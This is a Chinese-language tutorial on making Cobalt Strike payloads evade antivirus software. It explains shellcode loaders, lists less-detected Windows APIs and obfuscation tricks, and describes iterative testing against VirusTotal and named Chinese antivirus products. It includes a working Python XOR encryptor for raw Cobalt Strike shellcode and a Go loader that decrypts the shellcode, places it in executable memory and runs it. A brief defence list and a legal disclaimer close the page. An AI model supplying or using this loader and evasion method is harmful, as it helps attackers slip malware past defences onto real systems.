CS免杀从0到1实战指南<\/h1>

1. 免杀基础概念<\/h2>

免杀技术(Anti-Virus Evasion)是指通过各种手段使恶意程序绕过杀毒软件的检测。在Cobalt Strike(CS)中，免杀通常由两部分组成：<\/p>

Loader(加载器)<\/strong>：负责在内存中加载和执行恶意代码<\/li>

Shellcode<\/strong>：实际执行的恶意代码，通常是CS的上线指令<\/li> <\/ul>
2. Loader核心原理<\/h2>
Loader的核心功能步骤：<\/p>

读取Shellcode<\/strong>：获取加密或混淆的shellcode<\/li>
分配内存<\/strong>：在当前进程中申请可读、可写、可执行(RWX)的内存空间<\/li>
复制Shellcode<\/strong>：将shellcode复制到新分配的内存中<\/li>
执行Shellcode<\/strong>：通过线程或其他方式跳转到内存起始地址执行<\/li> <\/ol>
3. Loader实现技术<\/h2>
3.1 基础API实现<\/h3>
传统实现方式使用以下Windows API：<\/p>

VirtualAlloc<\/code>：分配内存<\/li>
RtlMoveMemory<\/code>：复制内存<\/li>
CreateThread<\/code>：创建执行线程<\/li> <\/ul> 问题<\/strong>：这些API已被杀软标记为高危特征<\/p> 3.2 替代API方案<\/h3> 使用较少见的API实现相同功能：<\/p> 内存分配替代：NtAllocateVirtualMemory<\/code><\/li> 内存复制替代：RtlCopyMemory<\/code><\/li> 线程执行替代：QueueUserAPC<\/code> + NtTestAlert<\/code>组合<\/li> <\/ul> 3.3 代码混淆技术<\/h3> 函数名混淆<\/strong>：使用随机生成的函数名替代标准API名称<\/li> 无用代码插入<\/strong>：添加不影响功能的冗余代码<\/li> 变量名随机化<\/strong>：避免使用有意义的变量名<\/li> <\/ol> 4. Shellcode处理技术<\/h2> 4.1 Shellcode生成<\/h3> 使用CS 4.9生成raw格式的shellcode（该版本具有一定免杀性）<\/p> 4.2 Shellcode加密<\/h3> 常用加密方式：<\/p> 异或加密<\/strong>：简单高效，易于实现<\/li> AES加密<\/strong>：安全性更高但实现复杂<\/li> 自定义加密算法<\/strong>：特征更少但开发成本高<\/li> <\/ul> 4.3 文件分离技术<\/h3> 将加密的shellcode存储在单独文件中，运行时由loader读取解密执行<\/p> 5. 完整免杀实现流程<\/h2> 5.1 准备工作<\/h3> 生成CS的raw格式shellcode<\/li> 准备加密脚本（如异或加密）<\/li> <\/ol> 5.2 加密Shellcode<\/h3> 使用异或加密示例：<\/p> # 异或加密脚本<\/span> <\/span><\/span>key =<\/span> 0xAA<\/span> # 自定义密钥<\/span> <\/span><\/span>with<\/span> open('shellcode.bin'<\/span>, 'rb'<\/span>) as<\/span> f: <\/span><\/span> data =<\/span> f.<\/span>read() <\/span><\/span> <\/span><\/span>encrypted =<\/span> bytes([b ^<\/span> key for<\/span> b in<\/span> data]) <\/span><\/span> <\/span><\/span>with<\/span> open('encrypted.bin'<\/span>, 'wb'<\/span>) as<\/span> f: <\/span><\/span> f.<\/span>write(encrypted) <\/span><\/span><\/code><\/pre>5.3 Loader实现<\/h3> Go语言实现示例（关键部分）：<\/p> package<\/span> main<\/span> <\/span><\/span> <\/span><\/span>import<\/span> ( <\/span><\/span> "io\/ioutil"<\/span> <\/span><\/span> "syscall"<\/span> <\/span><\/span> "unsafe"<\/span> <\/span><\/span>) <\/span><\/span> <\/span><\/span>func<\/span> main<\/span>() { <\/span><\/span> \/\/ 1. 读取加密的shellcode <\/span><\/span><\/span><\/span> encrypted<\/span>, _<\/span> :=<\/span> ioutil<\/span>.ReadFile<\/span>("encrypted.bin"<\/span>) <\/span><\/span> <\/span><\/span> \/\/ 2. 解密shellcode（异或） <\/span><\/span><\/span><\/span> key<\/span> :=<\/span> byte(0xAA<\/span>) <\/span><\/span> shellcode<\/span> :=<\/span> make([]byte<\/span>, len(encrypted<\/span>)) <\/span><\/span> for<\/span> i<\/span> :=<\/span> 0<\/span>; i<\/span> < len(encrypted<\/span>); i<\/span>++<\/span> { <\/span><\/span> shellcode<\/span>[i<\/span>] = encrypted<\/span>[i<\/span>] ^ key<\/span> <\/span><\/span> } <\/span><\/span> <\/span><\/span> \/\/ 3. 分配内存 <\/span><\/span><\/span><\/span> kernel32<\/span> :=<\/span> syscall<\/span>.NewLazyDLL<\/span>("kernel32.dll"<\/span>) <\/span><\/span> ntdll<\/span> :=<\/span> syscall<\/span>.NewLazyDLL<\/span>("ntdll.dll"<\/span>) <\/span><\/span> <\/span><\/span> VirtualAlloc<\/span> :=<\/span> kernel32<\/span>.NewProc<\/span>("VirtualAlloc"<\/span>) <\/span><\/span> addr<\/span>, _<\/span>, _<\/span> :=<\/span> VirtualAlloc<\/span>.Call<\/span>(0<\/span>, uintptr(len(shellcode<\/span>)), 0x1000<\/span>|0x2000<\/span>, 0x40<\/span>) <\/span><\/span> <\/span><\/span> \/\/ 4. 复制shellcode到内存 <\/span><\/span><\/span><\/span> RtlCopyMemory<\/span> :=<\/span> ntdll<\/span>.NewProc<\/span>("RtlCopyMemory"<\/span>) <\/span><\/span> RtlCopyMemory<\/span>.Call<\/span>(addr<\/span>, uintptr(unsafe<\/span>.Pointer<\/span>(&<\/span>shellcode<\/span>[0<\/span>])), uintptr(len(shellcode<\/span>))) <\/span><\/span> <\/span><\/span> \/\/ 5. 执行shellcode <\/span><\/span><\/span><\/span> syscall<\/span>.Syscall<\/span>(addr<\/span>, 0<\/span>, 0<\/span>, 0<\/span>, 0<\/span>) <\/span><\/span>} <\/span><\/span><\/code><\/pre>5.4 编译优化<\/h3> 使用命令行编译：go build -ldflags="-s -w" loader.go<\/code><\/li> 使用UPX等工具压缩（可能增加被杀风险）<\/li> 修改PE头信息混淆<\/li> <\/ol> 6. 进阶免杀技术<\/h2> 6.1 内存加密技术<\/h3> 实时解密<\/strong>：仅解密当前执行的部分代码<\/li> 内存混淆<\/strong>：定期改变内存中的代码布局<\/li> <\/ul> 6.2 自定义Shellcode<\/h3> 修改CS默认的shellcode特征<\/li> 实现分段加载执行<\/li> 添加反调试和反沙箱代码<\/li> <\/ol> 6.3 API调用混淆<\/h3> 动态获取API地址（GetProcAddress）<\/li> 使用syscall直接调用<\/li> 延迟加载关键API<\/li> <\/ol> 7. 测试与绕过<\/h2> 7.1 静态检测绕过<\/h3> 文件扫描测试（Virustotal）<\/li> 特征修改迭代<\/li> 多杀软兼容性测试<\/li> <\/ol> 7.2 动态检测绕过<\/h3> 行为监控测试（火绒、360等）<\/li> 内存扫描对抗<\/li> 执行流混淆<\/li> <\/ol> 8. 防御措施<\/h2> 定期更新杀毒软件特征库<\/li> 启用行为检测和内存保护<\/li> 限制非必要的高危API调用<\/li> 实施应用程序白名单<\/li> <\/ol> 9. 参考资源<\/h2> Loader技术详解<\/a><\/li> Shellcode免杀进阶<\/a><\/li> Windows API官方文档<\/li> <\/ol> 10. 法律声明<\/h2> 本文仅用于安全研究和技术学习目的，请勿用于非法用途。未经授权对他人计算机系统进行测试属于违法行为。<\/p>